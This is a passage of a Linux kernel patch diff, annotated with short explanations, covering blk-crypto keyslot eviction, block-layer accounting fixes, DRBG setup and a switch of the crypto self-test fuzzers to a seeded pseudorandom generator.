+-	 * may have been used, so try to evict the key from blk-crypto-fallback.
++	 * An error can only occur here if the key failed to be evicted from a
++	 * keyslot (due to a hardware or driver issue) or is allegedly still in
++	 * use by I/O (due to a kernel bug).  Even in these cases, the key is
++	 * still unlinked from the keyslot management structures, and the caller
++	 * is allowed and expected to free it right away.  There's nothing
++	 * callers can do to handle errors, so just log them and return void.
+ 	 */
+-	return blk_crypto_fallback_evict_key(key);
++	if (err)
++		pr_warn_ratelimited("%pg: error %d evicting key\n", bdev, err);
+ }
+ EXPORT_SYMBOL_GPL(blk_crypto_evict_key);
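
What the new kerneldoc asks of callers can be sketched as a hypothetical
upper-layer helper; this is not code from the patch, and the names are
illustrative only:

#include <linux/blk-crypto.h>
#include <linux/slab.h>

/* Per the new contract: evict on every bdev the key was used on,
 * then free the key unconditionally; eviction failures are only
 * logged by the block layer and are not the caller's to handle. */
static void fs_forget_key(struct block_device *bdev,
                          struct blk_crypto_key *key)
{
        blk_crypto_evict_key(bdev, key);        /* returns void now */
        kfree_sensitive(key);
}
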
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index ec7219caea165..5c265791decbd 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -258,6 +258,11 @@ enum {
+ 	VRATE_MIN		= VTIME_PER_USEC * VRATE_MIN_PPM / MILLION,
+ 	VRATE_CLAMP_ADJ_PCT	= 4,
+ 
++	/* switch iff the conditions are met for longer than this */
++	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
++};
++
++enum {
+ 	/* if IOs end up waiting for requests, issue less */
+ 	RQ_WAIT_BUSY_PCT	= 5,
+ 
+@@ -296,9 +301,6 @@ enum {
+ 	/* don't let cmds which take a very long time pin lagging for too long */
+ 	MAX_LAGGING_PERIODS	= 10,
+ 
+-	/* switch iff the conditions are met for longer than this */
+-	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
+-
+ 	/*
+ 	 * Count IO size in 4k pages.  The 12bit shift helps keeping
+ 	 * size-proportional components of cost calculation in closer
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index 808b58129d3e4..efe5504902a32 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -873,6 +873,8 @@ static struct request *attempt_merge(struct request_queue *q,
+ 	if (!blk_discard_mergable(req))
+ 		elv_merge_requests(q, req, next);
+ 
++	blk_crypto_rq_put_keyslot(next);
++
+ 	/*
+ 	 * 'next' is going away, so update stats accordingly
+ 	 */
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 86425167594cf..9f1bafb62973d 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -840,6 +840,12 @@ static void blk_complete_request(struct request *req)
+ 		req->q->integrity.profile->complete_fn(req, total_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	blk_crypto_rq_put_keyslot(req);
++
+ 	blk_account_io_completion(req, total_bytes);
+ 
+ 	do {
+@@ -905,6 +911,13 @@ bool blk_update_request(struct request *req, blk_status_t error,
+ 		req->q->integrity.profile->complete_fn(req, nr_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	if (blk_crypto_rq_has_keyslot(req) && nr_bytes >= blk_rq_bytes(req))
++		__blk_crypto_rq_put_keyslot(req);
++
+ 	if (unlikely(error && !blk_rq_is_passthrough(req) &&
+ 		     !(req->rq_flags & RQF_QUIET)) &&
+ 		     !test_bit(GD_DEAD, &req->q->disk->state)) {
+@@ -1332,7 +1345,7 @@ void blk_execute_rq_nowait(struct request *rq, bool at_head)
+ 	 * device, directly accessing the plug instead of using blk_mq_plug()
+ 	 * should not have any consequences.
+ 	 */
+-	if (current->plug)
++	if (current->plug && !at_head)
+ 		blk_add_rq_to_plug(current->plug, rq);
+ 	else
+ 		blk_mq_sched_insert_request(rq, at_head, true, false);
+@@ -2987,7 +3000,7 @@ void blk_mq_submit_bio(struct bio *bio)
+ 
+ 	blk_mq_bio_to_request(rq, bio, nr_segs);
+ 
+-	ret = blk_crypto_init_request(rq);
++	ret = blk_crypto_rq_get_keyslot(rq);
+ 	if (ret != BLK_STS_OK) {
+ 		bio->bi_status = ret;
+ 		bio_endio(bio);
+diff --git a/block/blk-stat.c b/block/blk-stat.c
+index 2ea01b5c1aca0..da9407b7d4abf 100644
+--- a/block/blk-stat.c
++++ b/block/blk-stat.c
+@@ -189,7 +189,7 @@ void blk_stat_disable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!--q->stats->accounting)
++	if (!--q->stats->accounting && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_clear(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+@@ -200,7 +200,7 @@ void blk_stat_enable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!q->stats->accounting++)
++	if (!q->stats->accounting++ && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_set(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
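
Both blk-stat.c hunks enforce the same invariant: QUEUE_FLAG_STATS must
stay set while either the accounting refcount is nonzero or a stats
callback is registered, so one consumer going away no longer clears the
flag out from under the other. The invariant restated as a predicate,
purely illustrative:

/* Should the queue keep collecting per-request statistics? */
static int stats_needed(unsigned int accounting, int have_callbacks)
{
        return accounting > 0 || have_callbacks;
}
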
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index d08f864f08bee..9de0677b3643d 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -493,7 +493,9 @@ void crypto_unregister_alg(struct crypto_alg *alg)
+ 	if (WARN(ret, "Algorithm %s is not registered", alg->cra_driver_name))
+ 		return;
+ 
+-	BUG_ON(refcount_read(&alg->cra_refcnt) != 1);
++	if (WARN_ON(refcount_read(&alg->cra_refcnt) != 1))
++		return;
++
+ 	if (alg->cra_destroy)
+ 		alg->cra_destroy(alg);
+ 
+diff --git a/crypto/drbg.c b/crypto/drbg.c
+index 982d4ca4526d8..ff4ebbc68efab 100644
+--- a/crypto/drbg.c
++++ b/crypto/drbg.c
+@@ -1546,7 +1546,7 @@ static int drbg_prepare_hrng(struct drbg_state *drbg)
+ 		const int err = PTR_ERR(drbg->jent);
+ 
+ 		drbg->jent = NULL;
+-		if (fips_enabled || err != -ENOENT)
++		if (fips_enabled)
+ 			return err;
+ 		pr_info("DRBG: Continuing without Jitter RNG\n");
+ 	}
+diff --git a/crypto/testmgr.c b/crypto/testmgr.c
+index 4476ac97baa5e..abd91fadd34f7 100644
+--- a/crypto/testmgr.c
++++ b/crypto/testmgr.c
+@@ -852,12 +852,50 @@ static int prepare_keybuf(const u8 *key, unsigned int ksize,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
++/*
++ * The fuzz tests use prandom instead of the normal Linux RNG since they don't
++ * need cryptographically secure random numbers.  This greatly improves the
++ * performance of these tests, especially if they are run before the Linux RNG
++ * has been initialized or if they are run on a lockdep-enabled kernel.
++ */
++
++static inline void init_rnd_state(struct rnd_state *rng)
++{
++	prandom_seed_state(rng, get_random_u64());
++}
++
++static inline u8 prandom_u8(struct rnd_state *rng)
++{
++	return prandom_u32_state(rng);
++}
++
++static inline u32 prandom_u32_below(struct rnd_state *rng, u32 ceil)
++{
++	/*
++	 * This is slightly biased for non-power-of-2 values of 'ceil', but this
++	 * isn't important here.
++	 */
++	return prandom_u32_state(rng) % ceil;
++}
++
++static inline bool prandom_bool(struct rnd_state *rng)
++{
++	return prandom_u32_below(rng, 2);
++}
++
++static inline u32 prandom_u32_inclusive(struct rnd_state *rng,
++					u32 floor, u32 ceil)
++{
++	return floor + prandom_u32_below(rng, ceil - floor + 1);
++}
++
+ /* Generate a random length in range [0, max_len], but prefer smaller values */
+-static unsigned int generate_random_length(unsigned int max_len)
++static unsigned int generate_random_length(struct rnd_state *rng,
++					   unsigned int max_len)
+ {
+-	unsigned int len = get_random_u32_below(max_len + 1);
++	unsigned int len = prandom_u32_below(rng, max_len + 1);
+ 
+-	switch (get_random_u32_below(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		return len % 64;
+ 	case 1:
+@@ -870,43 +908,44 @@ static unsigned int generate_random_length(unsigned int max_len)
+ }
+ 
+ /* Flip a random bit in the given nonempty data buffer */
+-static void flip_random_bit(u8 *buf, size_t size)
++static void flip_random_bit(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t bitpos;
+ 
+-	bitpos = get_random_u32_below(size * 8);
++	bitpos = prandom_u32_below(rng, size * 8);
+ 	buf[bitpos / 8] ^= 1 << (bitpos % 8);
+ }
+ 
+ /* Flip a random byte in the given nonempty data buffer */
+-static void flip_random_byte(u8 *buf, size_t size)
++static void flip_random_byte(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+-	buf[get_random_u32_below(size)] ^= 0xff;
++	buf[prandom_u32_below(rng, size)] ^= 0xff;
+ }
+ 
+ /* Sometimes make some random changes to the given nonempty data buffer */
+-static void mutate_buffer(u8 *buf, size_t size)
++static void mutate_buffer(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t num_flips;
+ 	size_t i;
+ 
+ 	/* Sometimes flip some bits */
+-	if (get_random_u32_below(4) == 0) {
+-		num_flips = min_t(size_t, 1 << get_random_u32_below(8), size * 8);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8),
++				  size * 8);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_bit(buf, size);
++			flip_random_bit(rng, buf, size);
+ 	}
+ 
+ 	/* Sometimes flip some bytes */
+-	if (get_random_u32_below(4) == 0) {
+-		num_flips = min_t(size_t, 1 << get_random_u32_below(8), size);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8), size);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_byte(buf, size);
++			flip_random_byte(rng, buf, size);
+ 	}
+ }
+ 
+ /* Randomly generate 'count' bytes, but sometimes make them "interesting" */
+-static void generate_random_bytes(u8 *buf, size_t count)
++static void generate_random_bytes(struct rnd_state *rng, u8 *buf, size_t count)
+ {
+ 	u8 b;
+ 	u8 increment;
+@@ -915,11 +954,11 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 	if (count == 0)
+ 		return;
+ 
+-	switch (get_random_u32_below(8)) { /* Choose a generation strategy */
++	switch (prandom_u32_below(rng, 8)) { /* Choose a generation strategy */
+ 	case 0:
+ 	case 1:
+ 		/* All the same byte, plus optional mutations */
+-		switch (get_random_u32_below(4)) {
++		switch (prandom_u32_below(rng, 4)) {
+ 		case 0:
+ 			b = 0x00;
+ 			break;
+@@ -927,28 +966,28 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 			b = 0xff;
+ 			break;
+ 		default:
+-			b = get_random_u8();
++			b = prandom_u8(rng);
+ 			break;
+ 		}
+ 		memset(buf, b, count);
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	case 2:
+ 		/* Ascending or descending bytes, plus optional mutations */
+-		increment = get_random_u8();
+-		b = get_random_u8();
++		increment = prandom_u8(rng);
++		b = prandom_u8(rng);
+ 		for (i = 0; i < count; i++, b += increment)
+ 			buf[i] = b;
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	default:
+ 		/* Fully random bytes */
+-		for (i = 0; i < count; i++)
+-			buf[i] = get_random_u8();
++		prandom_bytes_state(rng, buf, count);
+ 	}
+ }
+ 
+-static char *generate_random_sgl_divisions(struct test_sg_division *divs,
++static char *generate_random_sgl_divisions(struct rnd_state *rng,
++					   struct test_sg_division *divs,
+ 					   size_t max_divs, char *p, char *end,
+ 					   bool gen_flushes, u32 req_flags)
+ {
+@@ -959,24 +998,26 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 		unsigned int this_len;
+ 		const char *flushtype_str;
+ 
+-		if (div == &divs[max_divs - 1] || get_random_u32_below(2) == 0)
++		if (div == &divs[max_divs - 1] || prandom_bool(rng))
+ 			this_len = remaining;
+ 		else
+-			this_len = get_random_u32_inclusive(1, remaining);
++			this_len = prandom_u32_inclusive(rng, 1, remaining);
+ 		div->proportion_of_total = this_len;
+ 
+-		if (get_random_u32_below(4) == 0)
+-			div->offset = get_random_u32_inclusive(PAGE_SIZE - 128, PAGE_SIZE - 1);
+-		else if (get_random_u32_below(2) == 0)
+-			div->offset = get_random_u32_below(32);
++		if (prandom_u32_below(rng, 4) == 0)
++			div->offset = prandom_u32_inclusive(rng,
++							    PAGE_SIZE - 128,
++							    PAGE_SIZE - 1);
++		else if (prandom_bool(rng))
++			div->offset = prandom_u32_below(rng, 32);
+ 		else
+-			div->offset = get_random_u32_below(PAGE_SIZE);
+-		if (get_random_u32_below(8) == 0)
++			div->offset = prandom_u32_below(rng, PAGE_SIZE);
++		if (prandom_u32_below(rng, 8) == 0)
+ 			div->offset_relative_to_alignmask = true;
+ 
+ 		div->flush_type = FLUSH_TYPE_NONE;
+ 		if (gen_flushes) {
+-			switch (get_random_u32_below(4)) {
++			switch (prandom_u32_below(rng, 4)) {
+ 			case 0:
+ 				div->flush_type = FLUSH_TYPE_REIMPORT;
+ 				break;
+@@ -988,7 +1029,7 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 
+ 		if (div->flush_type != FLUSH_TYPE_NONE &&
+ 		    !(req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-		    get_random_u32_below(2) == 0)
++		    prandom_bool(rng))
+ 			div->nosimd = true;
+ 
+ 		switch (div->flush_type) {
+@@ -1023,7 +1064,8 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ }
+ 
+ /* Generate a random testvec_config for fuzz testing */
+-static void generate_random_testvec_config(struct testvec_config *cfg,
++static void generate_random_testvec_config(struct rnd_state *rng,
++					   struct testvec_config *cfg,
+ 					   char *name, size_t max_namelen)
+ {
+ 	char *p = name;
+@@ -1035,7 +1077,7 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 
+ 	p += scnprintf(p, end - p, "random:");
+ 
+-	switch (get_random_u32_below(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 	case 1:
+ 		cfg->inplace_mode = OUT_OF_PLACE;
+@@ -1050,12 +1092,12 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (get_random_u32_below(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		cfg->req_flags |= CRYPTO_TFM_REQ_MAY_SLEEP;
+ 		p += scnprintf(p, end - p, " may_sleep");
+ 	}
+ 
+-	switch (get_random_u32_below(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		cfg->finalization_type = FINALIZATION_TYPE_FINAL;
+ 		p += scnprintf(p, end - p, " use_final");
+@@ -1070,36 +1112,37 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-	    get_random_u32_below(2) == 0) {
++	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) && prandom_bool(rng)) {
+ 		cfg->nosimd = true;
+ 		p += scnprintf(p, end - p, " nosimd");
+ 	}
+ 
+ 	p += scnprintf(p, end - p, " src_divs=[");
+-	p = generate_random_sgl_divisions(cfg->src_divs,
++	p = generate_random_sgl_divisions(rng, cfg->src_divs,
+ 					  ARRAY_SIZE(cfg->src_divs), p, end,
+ 					  (cfg->finalization_type !=
+ 					   FINALIZATION_TYPE_DIGEST),
+ 					  cfg->req_flags);
+ 	p += scnprintf(p, end - p, "]");
+ 
+-	if (cfg->inplace_mode == OUT_OF_PLACE && get_random_u32_below(2) == 0) {
++	if (cfg->inplace_mode == OUT_OF_PLACE && prandom_bool(rng)) {
+ 		p += scnprintf(p, end - p, " dst_divs=[");
+-		p = generate_random_sgl_divisions(cfg->dst_divs,
++		p = generate_random_sgl_divisions(rng, cfg->dst_divs,
+ 						  ARRAY_SIZE(cfg->dst_divs),
+ 						  p, end, false,
+ 						  cfg->req_flags);
+ 		p += scnprintf(p, end - p, "]");
+ 	}
+ 
+-	if (get_random_u32_below(2) == 0) {
+-		cfg->iv_offset = get_random_u32_inclusive(1, MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->iv_offset = prandom_u32_inclusive(rng, 1,
++						       MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " iv_offset=%u", cfg->iv_offset);
+ 	}
+ 
+-	if (get_random_u32_below(2) == 0) {
+-		cfg->key_offset = get_random_u32_inclusive(1, MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->key_offset = prandom_u32_inclusive(rng, 1,
++							MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " key_offset=%u", cfg->key_offset);
+ 	}
+ 
+@@ -1612,11 +1655,14 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_hash_vec_cfg(vec, vec_name, &cfg,
+ 						req, desc, tsgl, hashstate);
+@@ -1634,15 +1680,16 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+  * Generate a hash test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_hash_testvec(struct shash_desc *desc,
++static void generate_random_hash_testvec(struct rnd_state *rng,
++					 struct shash_desc *desc,
+ 					 struct hash_testvec *vec,
+ 					 unsigned int maxkeysize,
+ 					 unsigned int maxdatasize,
+ 					 char *name, size_t max_namelen)
+ {
+ 	/* Data */
+-	vec->psize = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->plaintext, vec->psize);
++	vec->psize = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->plaintext, vec->psize);
+ 
+ 	/*
+ 	 * Key: length in range [1, maxkeysize], but usually choose maxkeysize.
+@@ -1652,9 +1699,9 @@ static void generate_random_hash_testvec(struct shash_desc *desc,
+ 	vec->ksize = 0;
+ 	if (maxkeysize) {
+ 		vec->ksize = maxkeysize;
+-		if (get_random_u32_below(4) == 0)
+-			vec->ksize = get_random_u32_inclusive(1, maxkeysize);
+-		generate_random_bytes((u8 *)vec->key, vec->ksize);
++		if (prandom_u32_below(rng, 4) == 0)
++			vec->ksize = prandom_u32_inclusive(rng, 1, maxkeysize);
++		generate_random_bytes(rng, (u8 *)vec->key, vec->ksize);
+ 
+ 		vec->setkey_error = crypto_shash_setkey(desc->tfm, vec->key,
+ 							vec->ksize);
+@@ -1688,6 +1735,7 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_hash_alg_common(tfm)->base.cra_name;
+ 	const char *driver = crypto_ahash_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_shash *generic_tfm = NULL;
+ 	struct shash_desc *generic_desc = NULL;
+@@ -1701,6 +1749,8 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	if (noextratests)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -1769,10 +1819,11 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_hash_testvec(generic_desc, &vec,
++		generate_random_hash_testvec(&rng, generic_desc, &vec,
+ 					     maxkeysize, maxdatasize,
+ 					     vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_hash_vec_cfg(&vec, vec_name, cfg,
+ 					req, desc, tsgl, hashstate);
+@@ -2174,11 +2225,14 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_aead_vec_cfg(enc, vec, vec_name,
+ 						&cfg, req, tsgls);
+@@ -2194,6 +2248,7 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
+ struct aead_extra_tests_ctx {
++	struct rnd_state rng;
+ 	struct aead_request *req;
+ 	struct crypto_aead *tfm;
+ 	const struct alg_test_desc *test_desc;
+@@ -2212,24 +2267,26 @@ struct aead_extra_tests_ctx {
+  * here means the full ciphertext including the authentication tag.  The
+  * authentication tag (and hence also the ciphertext) is assumed to be nonempty.
+  */
+-static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
++static void mutate_aead_message(struct rnd_state *rng,
++				struct aead_testvec *vec, bool aad_iv,
+ 				unsigned int ivsize)
+ {
+ 	const unsigned int aad_tail_size = aad_iv ? ivsize : 0;
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 
+-	if (get_random_u32_below(2) == 0 && vec->alen > aad_tail_size) {
++	if (prandom_bool(rng) && vec->alen > aad_tail_size) {
+ 		 /* Mutate the AAD */
+-		flip_random_bit((u8 *)vec->assoc, vec->alen - aad_tail_size);
+-		if (get_random_u32_below(2) == 0)
++		flip_random_bit(rng, (u8 *)vec->assoc,
++				vec->alen - aad_tail_size);
++		if (prandom_bool(rng))
+ 			return;
+ 	}
+-	if (get_random_u32_below(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		/* Mutate auth tag (assuming it's at the end of ciphertext) */
+-		flip_random_bit((u8 *)vec->ctext + vec->plen, authsize);
++		flip_random_bit(rng, (u8 *)vec->ctext + vec->plen, authsize);
+ 	} else {
+ 		/* Mutate any part of the ciphertext */
+-		flip_random_bit((u8 *)vec->ctext, vec->clen);
++		flip_random_bit(rng, (u8 *)vec->ctext, vec->clen);
+ 	}
+ }
+ 
+@@ -2240,7 +2297,8 @@ static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
+  */
+ #define MIN_COLLISION_FREE_AUTHSIZE 8
+ 
+-static void generate_aead_message(struct aead_request *req,
++static void generate_aead_message(struct rnd_state *rng,
++				  struct aead_request *req,
+ 				  const struct aead_test_suite *suite,
+ 				  struct aead_testvec *vec,
+ 				  bool prefer_inauthentic)
+@@ -2249,17 +2307,18 @@ static void generate_aead_message(struct aead_request *req,
+ 	const unsigned int ivsize = crypto_aead_ivsize(tfm);
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 	const bool inauthentic = (authsize >= MIN_COLLISION_FREE_AUTHSIZE) &&
+-				 (prefer_inauthentic || get_random_u32_below(4) == 0);
++				 (prefer_inauthentic ||
++				  prandom_u32_below(rng, 4) == 0);
+ 
+ 	/* Generate the AAD. */
+-	generate_random_bytes((u8 *)vec->assoc, vec->alen);
++	generate_random_bytes(rng, (u8 *)vec->assoc, vec->alen);
+ 	if (suite->aad_iv && vec->alen >= ivsize)
+ 		/* Avoid implementation-defined behavior. */
+ 		memcpy((u8 *)vec->assoc + vec->alen - ivsize, vec->iv, ivsize);
+ 
+-	if (inauthentic && get_random_u32_below(2) == 0) {
++	if (inauthentic && prandom_bool(rng)) {
+ 		/* Generate a random ciphertext. */
+-		generate_random_bytes((u8 *)vec->ctext, vec->clen);
++		generate_random_bytes(rng, (u8 *)vec->ctext, vec->clen);
+ 	} else {
+ 		int i = 0;
+ 		struct scatterlist src[2], dst;
+@@ -2271,7 +2330,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		if (vec->alen)
+ 			sg_set_buf(&src[i++], vec->assoc, vec->alen);
+ 		if (vec->plen) {
+-			generate_random_bytes((u8 *)vec->ptext, vec->plen);
++			generate_random_bytes(rng, (u8 *)vec->ptext, vec->plen);
+ 			sg_set_buf(&src[i++], vec->ptext, vec->plen);
+ 		}
+ 		sg_init_one(&dst, vec->ctext, vec->alen + vec->clen);
+@@ -2291,7 +2350,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		 * Mutate the authentic (ciphertext, AAD) pair to get an
+ 		 * inauthentic one.
+ 		 */
+-		mutate_aead_message(vec, suite->aad_iv, ivsize);
++		mutate_aead_message(rng, vec, suite->aad_iv, ivsize);
+ 	}
+ 	vec->novrfy = 1;
+ 	if (suite->einval_allowed)
+@@ -2305,7 +2364,8 @@ static void generate_aead_message(struct aead_request *req,
+  * If 'prefer_inauthentic' is true, then this function will generate inauthentic
+  * test vectors (i.e. vectors with 'vec->novrfy=1') more often.
+  */
+-static void generate_random_aead_testvec(struct aead_request *req,
++static void generate_random_aead_testvec(struct rnd_state *rng,
++					 struct aead_request *req,
+ 					 struct aead_testvec *vec,
+ 					 const struct aead_test_suite *suite,
+ 					 unsigned int maxkeysize,
+@@ -2321,18 +2381,18 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (get_random_u32_below(4) == 0)
+-		vec->klen = get_random_u32_below(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_aead_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Tag length: in [0, maxauthsize], but usually choose maxauthsize */
+ 	authsize = maxauthsize;
+-	if (get_random_u32_below(4) == 0)
+-		authsize = get_random_u32_below(maxauthsize + 1);
++	if (prandom_u32_below(rng, 4) == 0)
++		authsize = prandom_u32_below(rng, maxauthsize + 1);
+ 	if (prefer_inauthentic && authsize < MIN_COLLISION_FREE_AUTHSIZE)
+ 		authsize = MIN_COLLISION_FREE_AUTHSIZE;
+ 	if (WARN_ON(authsize > maxdatasize))
+@@ -2341,11 +2401,11 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->setauthsize_error = crypto_aead_setauthsize(tfm, authsize);
+ 
+ 	/* AAD, plaintext, and ciphertext lengths */
+-	total_len = generate_random_length(maxdatasize);
+-	if (get_random_u32_below(4) == 0)
++	total_len = generate_random_length(rng, maxdatasize);
++	if (prandom_u32_below(rng, 4) == 0)
+ 		vec->alen = 0;
+ 	else
+-		vec->alen = generate_random_length(total_len);
++		vec->alen = generate_random_length(rng, total_len);
+ 	vec->plen = total_len - vec->alen;
+ 	vec->clen = vec->plen + authsize;
+ 
+@@ -2356,7 +2416,7 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->novrfy = 0;
+ 	vec->crypt_error = 0;
+ 	if (vec->setkey_error == 0 && vec->setauthsize_error == 0)
+-		generate_aead_message(req, suite, vec, prefer_inauthentic);
++		generate_aead_message(rng, req, suite, vec, prefer_inauthentic);
+ 	snprintf(name, max_namelen,
+ 		 "\"random: alen=%u plen=%u authsize=%u klen=%u novrfy=%d\"",
+ 		 vec->alen, vec->plen, authsize, vec->klen, vec->novrfy);
+@@ -2368,7 +2428,7 @@ static void try_to_generate_inauthentic_testvec(
+ 	int i;
+ 
+ 	for (i = 0; i < 10; i++) {
+-		generate_random_aead_testvec(ctx->req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, ctx->req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+@@ -2399,7 +2459,8 @@ static int test_aead_inauthentic_inputs(struct aead_extra_tests_ctx *ctx)
+ 		 */
+ 		try_to_generate_inauthentic_testvec(ctx);
+ 		if (ctx->vec.novrfy) {
+-			generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++			generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++						       ctx->cfgname,
+ 						       sizeof(ctx->cfgname));
+ 			err = test_aead_vec_cfg(DECRYPT, &ctx->vec,
+ 						ctx->vec_name, &ctx->cfg,
+@@ -2489,12 +2550,13 @@ static int test_aead_vs_generic_impl(struct aead_extra_tests_ctx *ctx)
+ 	 * the other implementation against them.
+ 	 */
